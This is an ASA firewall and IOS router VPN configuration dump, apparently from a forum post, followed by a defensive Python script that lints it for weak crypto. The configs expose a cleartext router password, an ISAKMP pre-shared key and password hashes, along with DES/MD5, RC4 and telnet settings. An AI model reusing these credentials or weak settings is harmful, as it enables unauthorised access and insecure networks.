 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet0/3
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet0/4
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet0/5
 shutdown
 nameif Deneme
 security-level 0
 no ip address
!
interface Management0/0
 management-only
 nameif management
 security-level 100
 ip address 192.168.1.1 255.255.255.0
!
interface GigabitEthernet1/0
 channel-group 1 mode on
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet1/1
 channel-group 1 mode on
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet1/2
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet1/3
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet1/4
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet1/5
 shutdown
 no nameif
 no security-level
 no ip address
!
interface Port-channel1
 lacp max-bundle 8
 nameif YSHA
 security-level 1
 ip address 10.51.100.31 255.255.255.0
!
boot system disk0:/asa952-smp-k8.bin
ftp mode passive
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
object network HA_6
 subnet 10.60.6.0 255.255.255.0
 description HA_6
object network HA_2
 subnet 10.60.2.0 255.255.255.0
 description HA_2
object network HA_3
 subnet 10.60.3.0 255.255.255.0
 description HA_3
object network HA_5
 subnet 10.60.5.0 255.255.255.0
 description HA_5
object network HA_7
 subnet 10.60.7.0 255.255.255.0
 description HA_7
object network HA_4
 subnet 10.60.4.0 255.255.255.0
 description HA_4
object network HA_1
 subnet 10.60.1.0 255.255.255.0
 description HA_1
object network HA_8
 subnet 10.60.8.0 255.255.255.0
 description HA_8
object network HA_9
 subnet 10.60.9.0 255.255.255.0
 description HA_9
object network HA_10
 subnet 10.60.10.0 255.255.255.0
 description HA_10
object network YKI-1
 subnet 10.51.1.0 255.255.255.0
object network HA-11
 subnet 10.60.11.0 255.255.255.0
 description HA-11
access-list global_access extended permit ip any any
access-list ViaSat_cryptomap extended permit ip object YKI-1 object HA_2
access-list ViaSat_cryptomap_2 extended permit ip object YKI-1 object HA_5
access-list ViaSat_cryptomap_1 extended permit ip object YKI-1 object HA_3
access-list ViaSat_cryptomap_3 extended permit ip object YKI-1 object HA_6
access-list ViaSat_cryptomap_4 extended permit ip object YKI-1 object HA_7
access-list ViaSat_cryptomap_5 extended permit ip object YKI-1 object HA_4
access-list ViaSat_cryptomap_7 extended permit ip object YKI-1 object HA_8
access-list ViaSat_cryptomap_6 extended permit ip object YKI-1 object HA_1
access-list ViaSat_cryptomap_9 extended permit ip object YKI-1 object HA_10
access-list ViaSat_cryptomap_10 extended permit ip object YKI-1 object HA_9
access-list Deneme_cryptomap extended permit ip object YKI-1 object HA-11
pager lines 24
logging asdm informational
mtu ViaSat 1500
mtu Deneme 1500
mtu management 1500
mtu YSHA 1500
icmp unreachable rate-limit 1 burst-size 1
asdm image disk0:/asdm-762.bin
no asdm history enable
arp timeout 14400
no arp permit-nonconnected
access-group global_access global
route ViaSat 10.1.3.0 255.255.255.0 10.51.22.1 1
route ViaSat 10.50.250.0 255.255.255.0 10.51.22.1 1
route YSHA 10.51.1.0 255.255.255.0 10.51.100.11 1
route ViaSat 10.60.0.0 255.255.0.0 10.51.22.1 1
timeout xlate 3:00:00
timeout pat-xlate 0:00:30
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 sctp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
timeout floating-conn 0:00:00
user-identity default-domain LOCAL
aaa authentication ssh console LOCAL
aaa authentication telnet console LOCAL
http server enable
http 192.168.1.0 255.255.255.0 management
http 10.51.2.0 255.255.255.0 YSHA
http 10.51.1.0 255.255.255.0 YSHA
http 10.51.4.0 255.255.255.0 YSHA
no snmp-server location
no snmp-server contact
crypto ipsec ikev1 transform-set ESP-AES-128-SHA esp-aes esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-128-MD5 esp-aes esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-SHA esp-aes-192 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-128-SHA-TRANS esp-aes esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-128-SHA-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-AES-128-MD5-TRANS esp-aes esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-128-MD5-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-AES-192-SHA-TRANS esp-aes-192 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-SHA-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-AES-192-MD5-TRANS esp-aes-192 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-MD5-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-AES-256-SHA-TRANS esp-aes-256 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-SHA-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-AES-256-MD5-TRANS esp-aes-256 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-MD5-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-3DES-SHA esp-3des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-3DES-SHA-TRANS esp-3des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-3DES-SHA-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-3DES-MD5-TRANS esp-3des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-3DES-MD5-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-DES-SHA esp-des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-DES-MD5 esp-des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-DES-SHA-TRANS esp-des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-DES-SHA-TRANS mode transport
crypto ipsec ikev1 transform-set ESP-DES-MD5-TRANS esp-des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-DES-MD5-TRANS mode transport
crypto ipsec security-association pmtu-aging infinite
crypto map ViaSat_map0 1 match address ViaSat_cryptomap
crypto map ViaSat_map0 1 set peer 10.50.250.11
crypto map ViaSat_map0 1 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 2 match address ViaSat_cryptomap_2
crypto map ViaSat_map0 2 set peer 10.50.250.35
crypto map ViaSat_map0 2 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 3 match address ViaSat_cryptomap_1
crypto map ViaSat_map0 3 set peer 10.50.250.19
crypto map ViaSat_map0 3 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 4 match address ViaSat_cryptomap_3
crypto map ViaSat_map0 4 set peer 10.50.250.43
crypto map ViaSat_map0 4 set ikev1 transform-set ESP-AES-256-SHA ESP-AES-256-MD5
crypto map ViaSat_map0 5 match address ViaSat_cryptomap_4
crypto map ViaSat_map0 5 set peer 10.50.250.51
crypto map ViaSat_map0 5 set ikev1 transform-set ESP-AES-256-SHA ESP-AES-256-MD5
crypto map ViaSat_map0 6 match address ViaSat_cryptomap_5
crypto map ViaSat_map0 6 set peer 10.50.250.27
crypto map ViaSat_map0 6 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 7 match address ViaSat_cryptomap_6
crypto map ViaSat_map0 7 set peer 10.50.250.3
crypto map ViaSat_map0 7 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 8 match address ViaSat_cryptomap_7
crypto map ViaSat_map0 8 set peer 10.50.250.59
crypto map ViaSat_map0 8 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 9 match address ViaSat_cryptomap_10
crypto map ViaSat_map0 9 set peer 10.50.250.67
crypto map ViaSat_map0 9 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 10 match address ViaSat_cryptomap_9
crypto map ViaSat_map0 10 set peer 10.50.250.75
crypto map ViaSat_map0 10 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map ViaSat_map0 interface ViaSat
crypto map Deneme_map0 1 match address Deneme_cryptomap
crypto map Deneme_map0 1 set peer 10.50.250.83
crypto map Deneme_map0 1 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map Deneme_map0 interface Deneme
crypto ca trustpoint ASDM_TrustPoint0
 enrollment terminal
 subject-name CN=MES2-Tai-Firewall
 no ca-check
 crl configure
crypto ca trustpool policy
crypto ikev1 enable ViaSat
crypto ikev1 policy 20
 authentication rsa-sig
 encryption aes-256
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 30
 authentication pre-share
 encryption aes-256
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 50
 authentication rsa-sig
 encryption aes-192
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 60
 authentication pre-share
 encryption aes-192
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 80
 authentication rsa-sig
 encryption aes
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 90
 authentication pre-share
 encryption aes
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 110
 authentication rsa-sig
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 120
 authentication pre-share
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 140
 authentication rsa-sig
 encryption des
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 150
 authentication pre-share
 encryption des
 hash sha
 group 2
 lifetime 86400
telnet 192.168.1.0 255.255.255.0 management
telnet 10.51.1.0 255.255.255.0 YSHA
telnet timeout 5
no ssh stricthostkeycheck
ssh 10.51.1.0 255.255.255.255 YSHA
ssh timeout 5
ssh key-exchange group dh-group1-sha1
console timeout 0
management-access YSHA
dhcpd address 192.168.1.2-192.168.1.254 management
dhcpd enable management
!
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
ssl cipher default custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA"
ssl cipher tlsv1 custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA"
ssl cipher dtlsv1 custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA"
group-policy GroupPolicy9 internal
group-policy GroupPolicy9 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy8 internal
group-policy GroupPolicy8 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy7 internal
group-policy GroupPolicy7 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy6 internal
group-policy GroupPolicy6 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy5 internal
group-policy GroupPolicy5 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy4 internal
group-policy GroupPolicy4 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy3 internal
group-policy GroupPolicy3 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy2 internal
group-policy GroupPolicy2 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy1 internal
group-policy GroupPolicy1 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy11 internal
group-policy GroupPolicy11 attributes
 vpn-tunnel-protocol ikev1
group-policy GroupPolicy10 internal
group-policy GroupPolicy10 attributes
 vpn-tunnel-protocol ikev1
dynamic-access-policy-record DfltAccessPolicy
username test password P4ttSyrm33SV8TYp encrypted privilege 15
username R1220 password 3.nSPNWoajd03dK4 encrypted
username erkan password g7yfRcqBFwlZb3Dd encrypted privilege 15
tunnel-group 10.50.250.11 type ipsec-l2l
tunnel-group 10.50.250.11 general-attributes
 default-group-policy GroupPolicy1
tunnel-group 10.50.250.11 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.35 type ipsec-l2l
tunnel-group 10.50.250.35 general-attributes
 default-group-policy GroupPolicy2
tunnel-group 10.50.250.35 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.19 type ipsec-l2l
tunnel-group 10.50.250.19 general-attributes
 default-group-policy GroupPolicy3
tunnel-group 10.50.250.19 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.43 type ipsec-l2l
tunnel-group 10.50.250.43 general-attributes
 default-group-policy GroupPolicy4
tunnel-group 10.50.250.43 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.51 type ipsec-l2l
tunnel-group 10.50.250.51 general-attributes
 default-group-policy GroupPolicy5
tunnel-group 10.50.250.51 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.27 type ipsec-l2l
tunnel-group 10.50.250.27 general-attributes
 default-group-policy GroupPolicy6
tunnel-group 10.50.250.27 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.3 type ipsec-l2l
tunnel-group 10.50.250.3 general-attributes
 default-group-policy GroupPolicy7
tunnel-group 10.50.250.3 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.59 type ipsec-l2l
tunnel-group 10.50.250.59 general-attributes
 default-group-policy GroupPolicy8
tunnel-group 10.50.250.59 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.67 type ipsec-l2l
tunnel-group 10.50.250.67 general-attributes
 default-group-policy GroupPolicy9
tunnel-group 10.50.250.67 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.75 type ipsec-l2l
tunnel-group 10.50.250.75 general-attributes
 default-group-policy GroupPolicy10
tunnel-group 10.50.250.75 ipsec-attributes
 ikev1 pre-shared-key *****
tunnel-group 10.50.250.83 type ipsec-l2l
tunnel-group 10.50.250.83 general-attributes
 default-group-policy GroupPolicy11
tunnel-group 10.50.250.83 ipsec-attributes
 ikev1 pre-shared-key *****
!
class-map inspection_default
 match default-inspection-traffic
!
policy-map type inspect dns preset_dns_map
 parameters
  message-length maximum client auto
  message-length maximum 512
policy-map global_policy
 class inspection_default
  inspect dns preset_dns_map
  inspect ftp
  inspect h323 h225
  inspect h323 ras
  inspect rsh
  inspect rtsp
  inspect esmtp
  inspect sqlnet
  inspect skinny
  inspect sunrpc
  inspect xdmcp
  inspect sip
  inspect netbios
  inspect tftp
  inspect ip-options
!
service-policy global_policy global
ROUTER
hostname Router
!
boot-start-marker
boot-end-marker
!
no aaa new-model
!
ip auth-proxy max-login-attempts 5
ip admission max-login-attempts 5
!
ip cef
no ipv6 cef
!
multilink bundle-name authenticated
!
username R1220 privilege 15 password 0 Ta14551748
!
crypto isakmp policy 1
 encr aes 256
 authentication pre-share
 group 2
crypto isakmp key Frr550Mrn address 10.51.22.2
crypto isakmp key Frr550Mrn address 10.51.21.2
crypto isakmp key Frr550Mrn address 10.51.23.2
crypto isakmp key Frr550Mrn address 10.52.21.2
crypto isakmp key Frr550Mrn address 10.52.22.2
crypto isakmp key Frr550Mrn address 10.49.21.3
crypto isakmp keepalive 10
!
crypto ipsec transform-set ANKA esp-aes 256 esp-sha-hmac
!
crypto map IPSEC 1 ipsec-isakmp
 description Batman
 set peer 10.51.21.2
 set peer 10.51.23.2
 set transform-set ANKA
 match address 101
crypto map IPSEC 2 ipsec-isakmp
 description Adana
 set peer 10.52.21.2
 set peer 10.52.22.2
 set transform-set ANKA
 match address 102
crypto map IPSEC 3 ipsec-isakmp
 description OSEM
 set peer 10.49.21.3
 set transform-set ANKA
 match address 103
crypto map IPSEC 4 ipsec-isakmp
 description Sivrihisar
 set peer 10.51.22.2
 set transform-set ANKA
 match address 104
!
interface FastEthernet0/0
 description HAU
 ip address 10.60.10.1 255.255.255.0
 duplex auto
 speed auto
!
interface FastEthernet0/1
 description UKB-2
 ip address 10.61.1.1 255.255.255.0
 duplex auto
 speed auto
!
interface FastEthernet0/2
 description VMBR
 no ip address
!
interface FastEthernet0/3
 description ACU
 no ip address
!
interface FastEthernet0/4
 description UKB-1
 no ip address
!
interface Vlan1
 ip address 10.50.250.75 255.255.255.248
 crypto map IPSEC
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
ip route 0.0.0.0 0.0.0.0 10.50.250.73
!
access-list 101 deny ip 10.60.10.0 0.0.0.255 10.50.250.0 0.0.0.255
access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.3.0 0.0.0.255
access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.4.0 0.0.0.255
access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.5.0 0.0.0.255
access-list 102 permit ip 10.60.10.0 0.0.0.255 10.52.0.0 0.0.255.255
access-list 103 deny ip any 10.50.250.0 0.0.0.255
access-list 103 permit ip 10.60.10.0 0.0.0.255 10.50.0.0 0.0.255.255
access-list 104 permit ip 10.60.10.0 0.0.0.255 10.51.100.0 0.0.0.255
!
control-plane
!
line con 0
line aux 0
line vty 0 4
 login
 transport input all
!
end
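The full configuration above is typical of what ASDM's wizard leaves behind: every crypto map entry offers ten transform-sets down to ESP-DES with HMAC-MD5, the IKEv1 policy list runs down to DES, all policies use DH group 2, the SSL cipher string includes RC4 and 3DES, SSH key exchange is dh-group1-sha1, telnet is enabled, and on the router the user password and ISAKMP keys are stored in cleartext (`password 0`, no `6` keyword). Because the peer chooses any set from the offered list, the weakest entry is the one an attacker-controlled or misconfigured peer will get. The script below, an added example and not code from the original post, flags each of these from a running-config. SAMPLE is a constructed excerpt with the same shape as the dump above, with secrets replaced by the placeholder EXAMPLE; the severity labels and the "group 14 or higher" floor are this example's choices.

```python
"""Lint an ASA/IOS running-config for weak crypto and management settings.

Added example, not code from the original post. SAMPLE is a constructed
excerpt modelled on the full configuration above (secrets replaced by EXAMPLE).
"""
import re

SAMPLE = """\
crypto ipsec ikev1 transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-DES-SHA esp-des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-DES-SHA-TRANS mode transport
crypto map ViaSat_map0 4 set ikev1 transform-set ESP-AES-256-SHA ESP-AES-256-MD5
crypto map ViaSat_map0 10 set ikev1 transform-set ESP-AES-256-SHA ESP-3DES-MD5 ESP-DES-SHA
crypto ikev1 policy 30
 authentication pre-share
 encryption aes-256
 hash sha
 group 2
 lifetime 86400
crypto ikev1 policy 150
 authentication pre-share
 encryption des
 hash sha
 group 2
 lifetime 86400
telnet 10.51.1.0 255.255.255.0 YSHA
ssh key-exchange group dh-group1-sha1
ssl cipher default custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA"
username R1220 privilege 15 password 0 EXAMPLE
crypto isakmp key EXAMPLE address 10.51.22.2
crypto ipsec transform-set ANKA esp-aes 256 esp-sha-hmac
"""

WEAK_ESP = re.compile(r"esp-(?:des|3des)\b|esp-md5-hmac")
WEAK_DH = {"1", "2", "5"}   # 768/1024/1536-bit MODP; this example treats group 14 as the floor
CLEARTEXT = re.compile(r"\bpassword 0 \S+|^crypto isakmp key (?:0 )?(?!6 )\S+ address")


def lint(config):
    """Return findings as (severity, line_no, line, reason) tuples."""
    findings, weak_sets, header = [], set(), ""
    for n, raw in enumerate(config.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("!"):
            continue
        indented = raw[0].isspace()
        if not indented:
            header = line            # remember which block an indented line belongs to
        note = lambda sev, why: findings.append((sev, n, line, why))
        m = re.match(r"crypto ipsec (?:ikev1 )?transform-set (\S+) (.+)", line)
        if m and WEAK_ESP.search(m.group(2)):
            weak_sets.add(m.group(1))
            note("high", "transform-set uses DES/3DES or HMAC-MD5")
        m = re.match(r"crypto map \S+ \d+ set (?:ikev1 )?transform-set (.+)", line)
        if m and set(m.group(1).split()) & weak_sets:
            # the peer may pick any set in the list, so the weakest one is what you can end up with
            note("high", "crypto map offers weak transform-sets: "
                 + " ".join(sorted(set(m.group(1).split()) & weak_sets)))
        if indented and header.startswith(("crypto ikev1 policy", "crypto isakmp policy")):
            k, _, v = line.partition(" ")
            if k in ("encryption", "encr") and re.match(r"(?:des|3des)\b", v):
                note("high", "phase 1 encryption is DES/3DES")
            if k == "hash" and v == "md5":
                note("medium", "phase 1 hash is MD5")
            if k == "group" and v in WEAK_DH:
                note("medium", f"phase 1 DH group {v} is below group 14")
        if re.match(r"ssl cipher .*(?:RC4|DES-CBC3)", line):
            note("high", "RC4/3DES enabled for TLS (ASDM, WebVPN)")
        if line.startswith("ssh key-exchange group dh-group1-sha1"):
            note("high", "SSH key exchange is DH group 1 (768-bit)")
        if re.match(r"telnet \d", line):
            note("high", "telnet management access is enabled")
        if CLEARTEXT.search(line):
            note("medium", "secret stored in cleartext (use an encrypted/type 6 form)")
    return findings


def severity_counts(findings):
    counts = {}
    for sev, *_ in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts


if __name__ == "__main__":
    for sev, n, line, why in lint(SAMPLE):
        print(f"{sev:6} line {n:3}: {why}\n        {line}")
```

Feed it the output of `show running-config` from both boxes; the fix for most findings is to delete the wizard-generated DES/3DES/MD5 sets and policies, leave a single AES-256/SHA/group 14 (or better) entry per crypto map, replace the `ssl cipher` strings, set `ssh key-exchange group dh-group14-sha1` and remove the `telnet` lines. Separately from the lint, note that as posted the ASA's entry 10 (peer 10.50.250.75, YKI-1 10.51.1.0/24 to HA_10 10.60.10.0/24) and the router's `crypto map IPSEC 4` (peer 10.51.22.2, ACL 104: 10.60.10.0/24 to 10.51.100.0/24) do not describe mirror-image flows, so that pair would fail phase 2 unless the live configuration differs from what is shown here.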